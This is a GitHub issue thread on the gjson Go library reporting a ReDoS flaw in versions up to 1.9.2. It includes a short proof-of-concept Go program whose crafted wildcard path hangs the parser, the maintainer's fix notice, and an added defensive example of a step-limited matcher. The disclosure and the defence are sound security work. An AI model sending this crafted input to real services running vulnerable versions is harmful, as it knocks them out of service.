tidwall / gjson

Get JSON values quickly - JSON parser for Go
MIT License
14.1k stars 846 forks

gjson.Get can cause DoS attacks. GJSON <= 1.9.2 allows attackers to cause a redos via crafted JSON input. #237

Closed cmdrgh closed 2 years ago

cmdrgh commented 2 years ago

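```go
package main

import "github.com/tidwall/gjson"

func main() {
	// The same crafted string is passed as both the JSON document and the path.
	testJson := `#[%"*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,*,,,,,,""*,*"]`
	gjson.Get(testJson, testJson)
}
```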

tidwall commented 2 years ago

Fixed in 77a57fd. Thanks for reporting.

AdamKorcz commented 2 years ago

@tidwall This is something that would be caught by fuzzing gjson continuously: https://github.com/google/oss-fuzz/pull/6901
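Added example, not part of the thread and not gjson's code or the change in 77a57fd: the reported path is a `%` (pattern match) query packed with `*` wildcards, and this sketch shows how a backtracking wildcard matcher can be given a step budget so such a pattern is rejected instead of consuming CPU. It assumes the cost comes from wildcard backtracking; `matchLimit`, `constructedWorstCase` and the budget value are hypothetical.

```go
package main

import (
	"fmt"
	"strings"
)

// matchLimit matches s against pattern ('*' = any run of bytes, '?' = one byte).
// It gives up after budget steps; stopped=true means "too complex, reject".
func matchLimit(s, pattern string, budget int) (matched, stopped bool) {
	steps := 0
	var rec func(s, p string) bool
	rec = func(s, p string) bool {
		for len(p) > 0 {
			if steps++; steps > budget {
				stopped = true
				return false
			}
			if p[0] == '*' {
				if len(p) == 1 {
					return true // trailing '*' matches the rest
				}
				// Trying every split point is the backtracking that blows up.
				for i := 0; i <= len(s) && !stopped; i++ {
					if rec(s[i:], p[1:]) {
						return true
					}
				}
				return false
			}
			if len(s) == 0 || (p[0] != '?' && p[0] != s[0]) {
				return false
			}
			s, p = s[1:], p[1:]
		}
		return len(s) == 0
	}
	matched = rec(s, pattern)
	return matched, stopped
}

// constructedWorstCase returns constructed input (not the string from the issue).
func constructedWorstCase() (s, pattern string) {
	return strings.Repeat(",", 40), strings.Repeat("*,", 30) + "x"
}

func main() {
	s, p := constructedWorstCase()
	fmt.Println(matchLimit(s, p, 10000)) // budget exhausted, input rejected
}
```

The budget is counted in matcher steps rather than wall-clock time, so the cutoff is deterministic and can be asserted in a unit test or fuzz harness.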